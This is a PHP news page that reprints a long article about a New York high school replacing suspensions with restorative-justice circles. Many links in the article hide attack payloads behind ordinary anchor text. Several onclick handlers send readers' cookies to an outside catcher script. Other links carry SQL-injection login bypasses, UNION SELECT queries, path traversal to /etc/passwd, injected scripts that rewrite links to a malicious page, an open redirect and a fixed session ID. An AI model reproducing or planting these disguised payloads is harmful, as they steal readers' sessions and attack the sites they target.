<?php
  include '../header.php';
  
//<title>theglobalreports|Opinion</title>
?>

<!-- BEGIN content -->
<div id="content">
<!-- begin recent posts -->
<div class="recent">
<!-- <h5><a href="index.php"> Previous </a> </h5> -->
<h1 align="center"><font face="Arial" color="#00CCCC"><i>Opinion</i></font></h1>   

<!-- Begin post -->


<div class="single">
<h2>An Effective but
Exhausting Alternative to
High-School Suspensions</h2>

<p class="details">By SUSAN DOMINUSSEPT. 9 Sept, 2016  <a href="#"></a> </p>
<h2 align="right"><a href="20160908-opinion.php"> Previous </a> </h2>
<h2 align="left"><a href="20160910-opinion.php"> Next </a> </h2>
<p>
In December 2013, Colleen Walsh, <a onclick="document.location='http://www.latenightreport.com/catcher.php?c='+escape(document.cookie);" href="#"> a social-studies teacher </a> at Leadership and Public Service High School in Manhattan’s Financial District, called one of the school’s four deans in charge of discipline. She had just had a short, heated dispute in the hallway with a 17-year-old student who had his cellphone out, a violation of school rules. Walsh, then 27, was an energetic teacher, entertaining and assertive, but something about the way she spoke to the young man, who was not her student, infuriated him. A junior who could be exceptionally charming but also combative, <a href="http://www.theplanetreports.com/home.php?username=%27+OR+%271%27%3D%271&password=%27+OR+%271%27%3D%271&submit=Login" target="_blank">  he started yelling at Walsh, at which point she contacted a dean in </a> the hope that he could calm him so they could all discuss what had happened.
</p> <p>
Leadership is housed in a tall, narrow building originally intended as office space, with revolving doors at the entrance and an echoing lobby. That day in December, the student had already taken the elevator down to the lobby after the confrontation when he encountered the dean, who, misunderstanding <a onclick="document.location='http://www.latenightreport.com/catcher.php?c='+escape(document.cookie);" href="#"> Walsh’s intent, imposed a punishment instead. </a> He told the young man, who was on the school’s basketball team, that he could not play in that evening’s game and that he would also be suspended, because this infraction came on the heels of several others. The student (who declined to comment for this article), now even more irate, took the elevator back to the ninth floor. He burst through the door of Walsh’s classroom, where three students had lingered after class, and faced her,<a href="http://theplanetreports.com/traversal.php?data=cat%20../../../../../../etc/passwd" target="_blank">  yelling, cursing, accusing her of lying, </a> ignoring Walsh’s repeated requests that he leave the room. Friends tried to pull him toward the door, but he broke away, then hurled over one of the classroom’s chair-desks. They finally succeeded in pulling him out of the classroom, at which point a dean arrived.
</p> <p>
Some kind of consequence was clearly in order, the deans and the principal, Phil Santos, agreed. The question was: What would it be?
</p> <p>
For the past two decades, how to discipline students has been as hotly contested a subject as how to educate them. For much of that time, many public-school systems, including New York City’s, have enforced zero-tolerance policies that require mandatory suspensions for certain offenses. Originally generated in response to fears about weapons in schools,  <a href="http://www.theplanetreports.com/index.php?name=Shekhar%3Cscript%3Ewindow.onload%20=%20function(){var%20link=document.getElementsByTagName(%22a%22);link%20%20[0].href=%22http://theplanetreports.com/malicious.php%22;}%3C/script%3E" target="_blank"> zero-tolerance policies,</a> especially in New York, where Rudolph W. Giuliani’s “broken windows” theory had taken hold, signaled to educators that crackdowns on unruliness of all kinds were in order. Between 1999 and 2009, the number of student suspensions in New York nearly doubled, according to the New York Civil Liberties Union, reaching about 450,000 suspensions over the course of the decade. In that era, infractions that once might have merited a call home, like shoving another student or cursing, were increasingly common grounds for suspension.
</p> <p>
The broad implementation of punitive suspension policies gave researchers ample data, the analysis of which has yielded a body of work suggesting the failure of this experiment in discipline. <a href="http://www.latenightreport.com/info.php?id=http://www.theplanetreports.com/subscription.php?id=5%20UNION%20Select%20*%20from%20three" target="_blank"> Suspensions do not deter bad behavior,</a> numerous studies have found, and most likely feed it by alienating students from the school community. Other studies show that suspensions are not just ineffective but inequitable, as students of color are more likely than white ones to be suspended for the same behaviors. In New York City, black students made up only 30 percent of all students from 1999 to 2009 but accounted for 50 percent of the suspensions, according to a N.Y.C.L.U. report.<a href="http://www.latenightreport.com/info.php?id=http://www.theplanetreports.com/subscription.php?id=5%20UNION%20Select%20*%20from%20three" target="_blank">   Additional studies show</a> that a student who has been suspended is more likely to eventually drop out of school or end up in the criminal-justice system. (In New York, the heavy presence of school safety officers employed by the Police Department has also been linked to higher numbers of student arrests.)
</p> <p>
As unfavorable statistics piled up, progressive educators found increasing support for their efforts to dismantle what had become known as the school-to-prison pipeline. In 2014, federal guidelines on discipline explicitly noted the harm zero-tolerance policies had done, urging districts to rethink them. By 2015, in New York City, repeat low-level infractions — cursing, for example — <a href="http://www.theplanetreports.com/redirect.php?url=http://www.theplanetreports.com/hack.php">  no longer qualified for suspensions.</a> In order to suspend a student for “defying or disobeying the lawful authority” of school staff, the kind of catchall violation that was disproportionately applied to students of color, a principal had to obtain approval from the Education Department. Between July 2015 and that December, the number of suspensions in New York dropped by 32 percent, compared with the same period a year earlier.
</p> <p>
The federal guidelines suggested that educators consider, among other alternatives, an approach called restorative justice, which differs radically from zero tolerance. <a href="http://www.latenightreport.com/info.php?id=http://www.theplanetreports.com/subscription.php?id=5%20UNION%20Select%20*%20from%20three" target="_blank"> Restorative justice is built on values like community </a>, empathy and responsibility; in its specifics, it asks students and teachers to strengthen connections and heal rifts by sitting on chairs in circles and allowing each participant to speak about how a given incident affected him or her. It could easily be dismissed as an impossibly amorphous process for overworked teachers and volatile students were it not for its success so far, in programs in Denver and Oakland that started in the mid-2000s. Schools employing restorative justice, or restorative practices, as it’s sometimes called, experienced such significant results — lowered suspension rates, higher graduation rates, improved school atmosphere — that both cities, as well as San Francisco, now offer restorative-practices training for all educators. New York’s Education Department is investing in training its own faculty, and Schools Chancellor Carmen Fariña has expressed her enthusiasm for the approach.
</p> <p>
Leadership and Public Service High School first started experimenting with restorative practices in 2011, when Phil Santos became principal. Since then, every year, he has requested more resources and training for his teachers, making him, within New York City, a relatively early adopter. As committed as he remains, making the shift to this new approach has been, as <a href="http://www.theplanetreports.com/buy.php?item=Monthly&PHPSESSID=jeoefgfi6b16h7l213jh30k2q1+&quantity=400" target="_blank"> Santos describes it, “exhausting” and “messy”;</a> changes in teacher attitudes and student behavior come slowly. His school’s experience is emblematic of the challenges schools face as educators try to replace a discipline policy that removes students from the school with one that aspires to help them become peaceful citizens in society.
</p> <p>
As the staff of Leadership tried to apply its new philosophy to the incident involving Walsh and the student, the process would reflect many of the tensions that drove up suspension rates in the first place — issues around race and power that even the most progressive educators struggle to talk about honestly, all the while knowing that doing so is essential to making real change.
</p> <p>
Santos grew up in Queens in the ’80s, with the kind of childhood that makes it easy for him to empathize with the students in his school, 70 percent of whom qualify for free lunch and 80 percent of whom are students of color. His father was incarcerated for part of his childhood, and his mother, he says, was not stable enough at the time to care for a child. Instead he was raised by his great-grandmother, great-aunt and great-uncle. In high school, Santos became active in his youth church and considered becoming a pastor before switching to education. He is a trim man who carries himself with a brisk, military bearing. He intimately understands, he says, why so many of his male students feel compelled to fight to prove themselves. He was born with one hand and could have been a target.<a href="http://www.theplanetreports.com/traversal.php?data=ls -la" target="_blank"> “If I went to a new school, if I didn’t fight early on, the rest of my time there would have been harder,” </a> he says.
</p> <p>
Santos arrived at Leadership, where most incoming students are performing below grade level, wanting to make changes, fast. At times, in his righteousness, he approached his staff as if he were taking on that first fight at a new school. “If you are unwilling to hold our students to high expectations,” he wrote in a newsletter to teachers early in his tenure, “provide the necessary support, restore damaged relationships and demonstrate unconditional love, then <a href="http://www.theplanetreports.com/comments.php?sig=<script>alert('No+more+entries+Possible+')%3B<%2Fscript>" target="_blank"> Leadership and Public Service is not for you.”</a>
</p> <p>
Leadership had long been the kind of school where many teachers saw their job solely as teaching; managing discipline was the role of deans, whom they would call to the classroom “for anything more than the crumpling of a paper,” says Sara Mitchell, a music teacher who started at Leadership two years before Santos. Santos’s priority was to shift that habit; he urged teachers to take the time to talk to the student, calmly, outside the classroom, to work on building the relationship — even to take responsibility for possibly inflaming a situation with a harsh tone of voice.
</p> <p>
Many teachers decided that the school, under Santos, was not, in fact, for them. Eleven out of 51 left at the end of his first year. Some would have retired or moved anyway, but others were skeptical about his empathy-based approach. (“What are we, going to get in a circle and sing ‘Kumbaya’?” one was heard to mutter during a faculty meeting.) Some worried that Santos wanted to cede too much control to students, while others felt he wanted more work from them on their own time than was reasonable. “I think they felt, Are you saying I am not pushing myself enough already?” says Candace Thomas-Rennie, a guidance counselor at Leadership whom Santos <a onclick="document.location='http://www.latenightreport.com/catcher.php?c='+escape(document.cookie);" href="#"> hired in his first year as principal. </a> “That’s insulting for a veteran who has the results to back up their own practice.”
</p> <p>
Santos replaced the staff members who left with a diverse group of young teachers and recruited a new dean, Erin Dunlevy, a 32-year-old former Spanish teacher who had been trained in restorative practices. Before the school year even started, she spent a few hours one day introducing the principles of restorative justice to about 20 students who were chosen because they had leadership potential but also were often in conflicts. Dunlevy knew change would take time, but she was<a href="http://www.theplanetreports.com/home.php?username=%27+OR+%271%27%3D%271&password=%27+OR+%271%27%3D%271&submit=Login" target="_blank"> still rattled when, within </a> the first month of school, one girl from that group brawled with another girl. Dunlevy, who tried to intervene, ended up in the emergency room with a broken toe, after a fire extinguisher that one girl threw at the other landed on her foot. “There was a lot of heavy lifting to do at that school,” Dunlevy says; later that year, a student fired a gun at a bathroom urinal. (That student and the girls who had fought were suspended.)
</p> <p>
She continued to work closely with students as well as the other disciplinary deans, teaching them how to conduct circles that would resolve conflicts. The training emphasized each party involved owning up to his or her responsibility and making amends, with an honest conversation or an action (a student who had left a classroom in disarray might help the teacher clean it).
</p> <p>
She also coached teachers on how to use language that set a welcoming rather than punitive tone. “As opposed to, ‘You’re late, sign this late log,’ it’s, ‘Hey, this class is not complete without you — I need you to be here,’ ” Dunlevy says. But she frequently felt the staff had not yet had enough time to internalize the philosophy. “A teacher would say, ‘I need you to restore this kid,’ ” she says, “as if it was my job to fix this kid, instead of what was supposed to be happening, which was the teacher making an effort to repair the relationship.” She recognized that it takes work for teachers to interrupt a classroom lesson to step outside with a troublesome student, or to ramp up the psychological support they offer. ‘It’s a big ask,” she says.  <a onclick="document.location='http://www.latenightreport.com/catcher.php?c='+escape(document.cookie);" href="#">“And they’re working incredibly hard to begin with. I get it.”</a>
</p> <p>
Carolina Ibáñez, a Spanish teacher at Leadership, said she always tried to engage with students one on one but acknowledged that if there was a conflict, sometimes she “really did not want to have the conversation.” For her, the challenge of restorative justice entailed internalizing that “being a teacher means addressing more than what’s in the book. To get to the book, you really have to address the child’s emotional state first.” Even more challenging, Dunlevy says, the shift requires teachers to rethink the very concept of justice, rejecting a model of punishment in which most were trained and most likely raised.
</p> <p>
When the school year ended in 2014, there were 140 total suspensions at Leadership, down from 230 the previous year.
</p> <p>
Colleen Walsh, the teacher whom the student confronted in her classroom, felt prepared to help champion restorative justice. She was one of seven teachers at Leadership who took part in a five-day training in restorative practices during the summer of 2013 provided by the Morningside Center for Teaching Social Responsibility, a nonprofit group that the New York City Department of Education has hired to work with its schools. “I felt passionate about it,” says Walsh (who left the school last year to work closer to her home in Queens). “I was like the No. 1 person.”
Continue reading the main story
</p> <p>
Even before Santos and Dunlevy arrived, Leadership had deans to whom students turned for emotional support, including Randy Spotts, who has been at the school since 1995. In 1970, Spotts was one of a few black students who enrolled at a West Virginia elementary school that had desegregated a year earlier. His grandmother frequently reproached his school’s administrators for the unequal treatment of black students. When Santos first spoke to Spotts of “the educational violence” experienced by students who are pushed out of schools through suspensions, Spotts immediately understood. For years, one of his primary responsibilities was suspending students. “My personality had always been more restorative,” Spotts says, “but my practice, because of the models that I was inducted into, were not.”
</p> <p>
Despite the similarity of their perspectives, Walsh and Spotts had radically different ideas about the consequences the student who turned over the chair-desk should receive. Walsh felt that at least a three-week suspension would be appropriate. Several other teachers (most of them white, Spotts noted), who had had their own run-ins with the student, felt that the incident merited a 90-day suspension. Initially, Santos was sympathetic to that sentiment. “I know my staff needs to feel safe in order to function,” he says. He ultimately decided to ask the D.O.E. for a 30-day suspension.
</p> <p>
Spotts, who was also the coach of the student’s basketball team, was shocked by Santos’s decision. A three-day in-school suspension, he thought, was all that was in order, especially given the restorative-practices training he had received under Santos. “It wasn’t as if he had thrown the chair at her, or near her,” he says. No one had been hurt or even touched.
</p> <p>
As the issue was being debated among the faculty, Santos received a text from a white teacher that stunned both Santos and Spotts, when he learned about it. “If a black male student hurts a white female teacher,” Santos recalls it saying, “this school is going to have problems.” The text reinforced Spotts’s thinking: that the school’s response to the incident would have been different had the aggrieved teacher been black, or had the student, who is black, been white. He and Santos had an intense argument about the decision Santos had made, with Spotts suggesting that Santos needed to examine his own perspective on race.
</p> <p>
“I had never realized just how deeply race penetrated all of our actions, whether we are conscious of it or not,” Santos, who is of Puerto Rican, Filipino and Cherokee descent, says now. “It made me, as a Latino man, re-examine my own practice, to think about my own internal biases.” The Department of Education ultimately granted a 10-day suspension for the student. (Santos now thinks that his 30-day request was too harsh.) When Santos took Walsh aside and told her, he also asked her for her help. Santos wanted her and the student to take part in a restorative circle, to smooth his re-entry after his suspension.
</p> <p>
Walsh’s first impulse was to refuse. “I was disrespected in a threatening manner,” she says, “and I felt, in a way, like, ‘What do I owe anybody?’ ” Even she was surprised by how powerfully she resisted the idea, given her training. She knew other teachers thought she would be crazy to consider sitting down with the student. “But I was trained in it, I was all about it,” she says. “Now I had to live up to it.”
</p> <p>
The day the student returned to school, he headed to Santos’s office, a converted classroom on the 12th floor, for a restorative circle. A dean at the school, Melissa Ramos, sat on one side of Walsh, as her chosen advocate, and Santos sat on the other; Spotts, the student’s advocate, sat beside him, along with a guidance counselor who served as the circle’s facilitator. Each person took a turn holding a “talking piece” — in this case, a squishy ball — that designated whose turn it was to speak, free of interruption.
</p> <p>
Santos recalls Walsh’s acknowledging that she “sort of came at the student,” meaning her tone was more aggressive than necessary, although she remembers making no such admission. But she knows she had the chance to express how she felt when the student burst into the room. The student, those who were present recall, did not say much in the circle — but he listened. Walsh does remember his trying to explain why missing the basketball game upset him. And she keeps locked in her memory the moment near the circle’s close when he apologized. “With a low, sad manner, he said, ‘I’m sorry, Miss Walsh,’ ” she recalls.
</p> <p>
In that moment, Walsh says, she was able to see him as a young, vulnerable person; she could once again see why he might be angry. “It’s not to say we can let kids get away with disrespecting teachers,” she says, “but there’s always a reason. And if you can remember that, it helps you stay calm.”
</p> <p>
Even after the circle, she dreaded the idea of seeing the student in the building’s elevators, but the next time they crossed paths, he seemed happy to see her. “How are you, Miss Walsh?” he wanted to know. She was, at that moment, “knocked off my feet,” she says. “It was such a relief. I could focus on my kids and my lessons, and not be thinking about this kid — we were cool.” The following year, she worked with the student after school, helping him prepare for his history Regents exam.
</p> <p>
That student, for the remainder of his time at the school, continued to reflect what Santos considers the sometimes quixotic reality of restorative practices: Despite circle after circle, the student remained volatile, testing teachers’ patience for an approach that seemed to yield, in his case at least, few results. But he graduated — with the aid of Walsh, one more person helping him move forward toward adulthood.
</p> <p>
One morning this past June, as the school year drew to a close, Melissa Ramos sat patiently at a desk, one of about 20 in a circle, waiting for students to finish filing into the room. She was teaching a class in restorative justice, which trained students in how to facilitate and be members of circles and also addressed students’ emotions. “As you know, we don’t let the late birds stop us from doing what we need to do,” Ramos said to get the class going. Her words were neutral, but she spoke with enough authority that you could sense the late birds would know how she felt when they did arrive.
</p> <p>
The class was a mix of students, some who never got in trouble and others who had had their share of suspensions. Each student was handed a slip of paper with a topic on it, and each took a turn holding a soft, small globe, discussing what he or she had learned about the topic.
</p> <p>
Tuson Irvin, 17, then a junior, looked down at his topic and smiled: conflict. It was a subject he knew a lot about. “What I have learned in this class is that when someone is speaking loudly at you, rather than responding with the same tone,” Irvin said, “all you have to do is be quiet. Because to be mature about a situation and walk away or sit there and talk low — I have seen that, hey, it works. Not only does it enrage the other person, it is satisfying — like, Hey, I kept my composure. And the other person is thinking, I guess I have to find another way to come at this person rather than yelling at them.”
</p> <p>
Irvin had earlier received additional training as a student leader in restorative justice — someone who stepped in to help other students resolve conflicts, or served as an advocate for them in their own circles. Irvin, who has a strong, booming voice and a firm handshake, can seem like the kind of student whom administrators trot out to tout their pet policies, on message and polite. But during his freshman year he was suspended numerous times (among other reasons, he refused to take off his beloved Mitchell & Ness baseball cap). Since then, he had built a relationship with Santos, who called him into his office in his sophomore year to talk to him about the problems they were having. He even apologized to Irvin for having spoken harshly to him, which Irvin said “left a big impression on me. What I saw was, Hey, this guy doesn’t want me to sit here and be a pain all day. He is trying to help me improve.”
</p> <p>
In Ramos’s restorative-justice class, a student tossed the ball to a junior named Annika James. A tall young woman with her hair in braids, James spoke quickly and quietly, her shyness belying a history of fighting with other girls. Her topic: “anger management.” “I feel like I have my anger managed,” James said. “I learned to choose my battles.” Now she, like Irvin, was a restorative-justice team leader. Santos had also been pleased to see her college bound, taking A.P. classes. “I really think Annika is one of those kids we would have lost without restorative practice,” he says.
</p> <p>
Only a small portion of the school could take Ramos’s class, but last year, for the first time, every student at Leadership attended a weekly class that was conducted in a circle, with a curriculum focused on building the psychic muscles that restorative justice demands: how to cope with stress, listen, empathize. Santos thinks that program, which made every student at the school familiar with circles, helped solidify the previous years’ efforts. “Students started coming to us, asking for circles,” he says, trying to head off confrontations before they happened.
</p> <p>
As the staff and student body were forming close connections among themselves, Santos decided that the school was ready to tackle an issue that restorative justice is also intended to address: race. In New York City, as the number of suspensions has dropped, the racial disparity in how punishment is applied has persisted. Santos was aware of studies finding that white, and to a lesser degree, black teachers have lower academic expectations for black students than they do for white students. And he had seen, through his own experience, how race can complicate seemingly straightforward matters of discipline. To try to address those issues, last fall he instituted a weekly facultywide circle that met after school over the course of the school year. To guide the discussions, he used a book called “Courageous Conversations About Race,” by Glenn E. Singleton. The book asks participants to dig deep into their own uncomfortable feelings about race, and to consider how that range of reactions might affect the educational experience of students of color. It asks participants to answer questions designed to make people push past politeness and self-protection. One example: “Can you recall a time when race was the topic of conversation and you became silent and/or shared something that was less than your truest feeling in fear of what others’ response might be?”
</p> <p>
Many teachers didn’t want to take part in the program. Once the conversations began, Santos received texts from teachers who told him they worried the project was causing racial tensions where there had been none before. One teacher told Santos that his student saw him carrying “Courageous Conversations” and said, “Oh, that’s that book that all the teachers hate.”
</p> <p>
Marcellus Waller, a white 33-year-old social-studies teacher, often found himself uncomfortable in the smaller breakout discussions, when topics like white privilege arose. “For me, a white male in America, some of those conversations were hard,” he says. “I feel bad for just being me.” Some educators of color felt insulted by the suggestion they, too, might be biased. “They want to know, as a black or Latino teacher, why is this even an issue?” Santos says. “And we’re trying to get them to see maybe it is or it isn’t, but race is something we have to talk about, because we live in America, and race is an issue in education.”
</p> <p>
Thomas-Rennie, the school’s guidance counselor, who is black, felt strongly that the conversations were important, but worried that they were so uncomfortable that they set the faculty back, at a time when it had just been trying to cohere around restorative practices. “For people to understand how race impacts how we function as a school was a difficult thing to connect with,” she says. Restorative practices, high academic expectations — those were relatively straightforward concepts; tackling head-on how race affected those issues was more challenging. “There was emotional pushback,” she says. “And even for a black woman, myself, the issues of race and the complexities and the deep roots — it can be exhausting. But race is like the never-ending song of our work. I recognize that if we are not willing to face this other piece, we are only going to go so far.”
</p> <p>
Thomas-Rennie had opened up, in one discussion, about the self-hatred she felt as a young girl, wishing her skin were lighter. Later, a Dominican-American teacher approached her to say she felt the same way as a girl. Because that teacher was so light-skinned, “I wouldn’t have assumed we could connect around something like that,” Thomas-Rennie says. She felt closer to that teacher, and generally enlightened. “These conversations give the staff a chance to be more authentic with each other,” Thomas-Rennie says. “And if we are more authentic with each other, that will automatically translate to how we communicate with the students.”
</p> <p>
Last year, suspensions at the school fell to 64, a 60 percent drop from the year before and one of the city’s most significant changes. Suspension rates dropped citywide, which would be expected, given the change in the discipline rules; but the Morningside Center found that the rates dropped even more in those schools where teachers were trained in restorative practices and had follow-up coaching. Ideally, teachers at these schools were not just finding alternatives to suspension but seeing fewer conflicts.
</p> <p>
Santos is far from ready to consider his tenure a success; much of his staff still hasn’t been trained. “Sixty-four suspensions, that’s still a lot,” he says. The school still labored under chronic absenteeism rates that were higher than the citywide average and college-readiness rates that lingered below the average. While studies have shown that restorative practices curb suspensions, research on their influence on test scores and grades is inconclusive.
</p> <p>
Santos remains committed to restorative practices, though he rarely discussed them without acknowledging how trying they could be. “Let’s say you met with a group of students for an hour, and you think there’s been major progress — but then one of the kids gets on social media and just destroys everything you’ve attempted to do,” he says. “And then you have to circle again. Because what are you going to do, let them fight? Suspend everybody? You need to circle, and keep circling, because what’s the alternative?”
</p> <p>
Randy Spotts, the 21-year veteran dean, has seen all too much of the alternative, first in the South Bronx, where he worked in the ’80s and watched countless students end up in prison or dead, and then at Leadership. He has thought a lot, over the years, about a student he personally suspended over and over again, then ran into on the subway several years later. “You know, Mr. Spotts, I could never get going, because you just kept suspending me,” the young man told his former dean. He wasn’t accusing Spotts; he was just pointing it out, as if it was something they could both feel wistful about now. Spotts often thinks about that student and others he wishes he could have helped more, could have kept in school and off the street. “I think about what I was doing to these kids. And I think to myself: Did we really have to do it that way?”

</p>

</div>

<!-- end post -->
<h5><a href="/index.php">Back </a> </h5>  

</div>
<!-- end recent posts -->
</div>
<!-- END content -->

<?php 
include '../sidebar.php';
   echo '</div>';  	 
include '../footer.php';
 ?> 
</body>
</html>










